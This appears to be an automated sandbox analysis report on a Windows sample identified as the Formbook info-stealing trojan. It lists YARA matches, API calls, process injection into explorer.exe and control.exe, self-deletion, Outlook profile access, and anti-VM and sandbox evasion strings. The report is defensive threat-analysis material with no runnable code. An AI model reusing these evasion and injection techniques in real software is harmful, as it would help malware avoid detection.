        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0265CD04
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_0265F0D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_053741D0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07095DF0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_070955B8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_070955C8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07096343
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07096FC8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 0_2_07095DE1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015BF900
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D4120
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D99BF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168E824
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01671002
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA830
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016828EC
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016820A8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CB090
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E20A0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DAB40
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01682B28
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DA309
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016623E3
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EABD8
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167DBD2
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016703DA
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015EEBB0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0166FA2B
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674AEF
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016822AE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01681D55
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01682D07
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015B0D20
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_016825DD
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015CD5E0
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015E2581
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01672D82
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167D466
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015C841F
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01674496
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01681FF1
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0168DFCE
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015D6E30
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0167D616
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01682EF7
        Source: C:\Users\user\Desktop\vbc.exeCode function: String function: 015BB150 appears 133 times
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F99A0 NtCreateSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9840 NtDelayExecution,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9860 NtQuerySystemInformation,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F98F0 NtReadVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A50 NtCreateFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A20 NtResumeThread,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9540 NtReadFile,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F95D0 NtClose,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9710 NtQueryInformationToken,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9FE0 NtCreateMutant,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9780 NtMapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9950 NtQueueApcThread,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F99D0 NtCreateProcessEx,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FB040 NtSuspendThread,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9820 NtEnumerateKey,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F98A0 NtWriteVirtualMemory,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9B00 NtSetValueKey,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FA3B0 NtGetContextThread,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A10 NtQuerySection,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9A80 NtOpenDirectoryObject,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9560 NtWriteFile,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FAD30 NtSetContextThread,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9520 NtWaitForSingleObject,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F95F0 NtQueryInformationFile,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FA770 NtOpenThread,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9770 NtSetInformationFile,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9760 NtOpenProcess,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015FA710 NtOpenProcessToken,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9730 NtQueryVirtualMemory,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9650 NtQueryValueKey,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9670 NtQueryInformationProcess,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F9610 NtEnumerateValueKey,
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015F96D0 NtCreateKey,
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000002.415770591.0000000006E80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameKeysNormalize.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000000.362679786.00000000004D2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
        Source: vbc.exe, 00000000.00000002.415918626.0000000006EC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWebName.dll4 vs vbc.exe
        Source: vbc.exe, 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
        Source: vbc.exe, 00000000.00000002.416361250.0000000007010000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDoncepre.dll@ vs vbc.exe
        Source: vbc.exe, 00000006.00000003.407195484.0000000001513000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe, 00000006.00000003.404813945.0000000001373000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exe, 00000006.00000002.500864587.00000000016AF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs vbc.exe
        Source: vbc.exeBinary or memory string: OriginalFilenameSegm.exeB vs vbc.exe
        Source: vbc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: vbc.exeReversingLabs: Detection: 31%
        Source: vbc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\vbc.exe "C:\Users\user\Desktop\vbc.exe"
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Users\user\Desktop\vbc.exeProcess created: C:\Users\user\Desktop\vbc.exe C:\Users\user\Desktop\vbc.exe
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
        Source: C:\Users\user\Desktop\vbc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.logJump to behavior
        Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\4-9E1JJIJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/2@4/3
        Source: vbc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
        Source: C:\Users\user\Desktop\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
        Source: vbc.exe, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: vbc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: vbc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000006.00000003.406454999.00000000013F4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.404197199.000000000125D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.497959345.0000000004ADC000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.644322679.0000000004F2F000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000003.500502722.0000000004C79000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000000D.00000002.642912671.0000000004E10000.00000040.00000800.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        .NET source code contains potential unpacker
        Source: vbc.exe, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: 0.0.vbc.exe.4d0000.0.unpack, ProcExpGUI/Form1.cs.Net Code: WaitHandle System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_0160D0D1 push ecx; ret
        Source: initial sampleStatic PE information: section name: .text entropy: 7.777091407724558

        Hooking and other Techniques for Hiding and Protection

        barindex
        Deletes itself after installation
        Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\vbc.exeJump to behavior
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Yara detected AntiVM3
        Source: Yara matchFile source: 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
        Source: vbc.exe, 00000000.00000002.408488225.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
        Source: C:\Users\user\Desktop\vbc.exe TID: 3304Thread sleep time: -45877s >= -30000s
        Source: C:\Users\user\Desktop\vbc.exe TID: 2700Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01685BA5 rdtsc
        Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\vbc.exeAPI coverage: 4.4 %
        Source: C:\Users\user\Desktop\vbc.exeProcess information queried: ProcessInformation
        Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 45877
        Source: C:\Users\user\Desktop\vbc.exeThread delayed: delay time: 922337203685477
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
        Source: explorer.exe, 00000007.00000000.480995882.0000000007FBD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}d
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000I
        Source: explorer.exe, 00000007.00000000.471787867.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
        Source: explorer.exe, 00000007.00000000.430054457.000000000807C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
        Source: explorer.exe, 00000007.00000000.473972364.00000000042EE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q^
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
        Source: explorer.exe, 00000007.00000000.536669391.00000000042A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000O
        Source: vbc.exe, 00000000.00000002.407071082.00000000028F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_01685BA5 rdtsc
        Source: C:\Users\user\Desktop\vbc.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\vbc.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\vbc.exeCode function: 6_2_015DB944 mov eax, dword ptr fs:[00000030h]
